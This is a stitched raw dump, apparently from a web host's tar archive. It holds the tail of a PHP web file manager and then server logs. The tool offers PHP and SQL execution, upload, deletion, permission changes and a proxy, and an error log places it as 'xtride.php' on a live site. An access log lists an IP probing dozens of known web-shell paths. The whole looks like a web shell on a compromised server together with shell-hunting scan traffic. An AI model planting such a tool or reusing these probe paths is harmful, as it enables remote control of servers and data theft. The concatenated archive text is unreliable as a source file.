if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <form method="post" action="<?=$url_inc?>" style="display:inline"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15"> <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5"> <input type="submit" name="search" value="<?=__('Search')?>"> </form> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/henriyzx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> error_log 0000644 00000000411 15114742020 0006451 0 ustar 00 [05-Dec-2025 19:05:26 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/henriyzx/Filemanager/master/languages/en.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gqdcvggs/ia.imators.com/xtride.php on line 92 var/log/apache2/domlogs/gqdcvggs/ia.imators.com 0000640 00000033463 15114742130 0015442 0 ustar 00 4.189.253.242 - - [05/Dec/2025:16:38:08 +0100] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:09 +0100] "GET /class-t.api.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:09 +0100] "GET /zwso.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:09 +0100] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:09 +0100] "GET /class19.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:10 +0100] "GET /class20.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:10 +0100] "GET /admin.php?p= HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:10 +0100] "GET /randkeyword.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:10 +0100] "GET /fwe.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:11 +0100] "GET /images/m.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:11 +0100] "GET /g.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:11 +0100] "GET /tx1.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:11 +0100] "GET /xv.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:11 +0100] "GET /x56.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:12 +0100] "GET /htaccess.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:12 +0100] "GET /readme.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:12 +0100] "GET /x50.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:12 +0100] "GET /fv.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:13 +0100] "GET /file.php? HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:13 +0100] "GET /lsd.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:13 +0100] "GET /EM.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:13 +0100] "GET /f-401.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:14 +0100] "GET /as.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:14 +0100] "GET /wsd.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:14 +0100] "GET /gtc.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:14 +0100] "GET /atx.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:15 +0100] "GET /z60.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:15 +0100] "GET /403.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:15 +0100] "GET /m.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:15 +0100] "GET /themes.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:16 +0100] "GET /wp-admin/maint/about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:16 +0100] "GET /wp-admin/network/wp-conflg.php?p= HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:16 +0100] "GET /click.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:16 +0100] "GET /install.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:17 +0100] "GET /lv.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:17 +0100] "GET /simple.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:17 +0100] "GET /css.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:17 +0100] "GET /cong.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:18 +0100] "GET /wp-includes/images/wp-login.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:18 +0100] "GET /cong.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:18 +0100] "GET /w.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:18 +0100] "GET /404.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:19 +0100] "GET /ioxi-o.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:19 +0100] "GET /0x.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:19 +0100] "GET /css.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:19 +0100] "GET /222.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:19 +0100] "GET /wp-content/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:20 +0100] "GET /admin.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:20 +0100] "GET /wp-admin/maint/maint.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:20 +0100] "GET /classwithtostring.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:20 +0100] "GET /abcd.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:21 +0100] "GET /autoload_classmap.php?p= HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:21 +0100] "GET /inputs.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:21 +0100] "GET /about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:21 +0100] "GET /alfa.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:22 +0100] "GET /themes/twentytwentytwo/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:22 +0100] "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:22 +0100] "GET /wp-admin/wp-conflg.php?p= HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:22 +0100] "GET /wp-admin/css/wp-conflg.php?p= HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:23 +0100] "GET /manager.php?p= HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:23 +0100] "GET /item.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:23 +0100] "GET /plugins/Cache/footer.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:23 +0100] "GET /404.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:24 +0100] "GET /mail.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:24 +0100] "GET /wp-content/plugins/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:24 +0100] "GET /sx.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:24 +0100] "GET /wp-admin/maint/admin.php 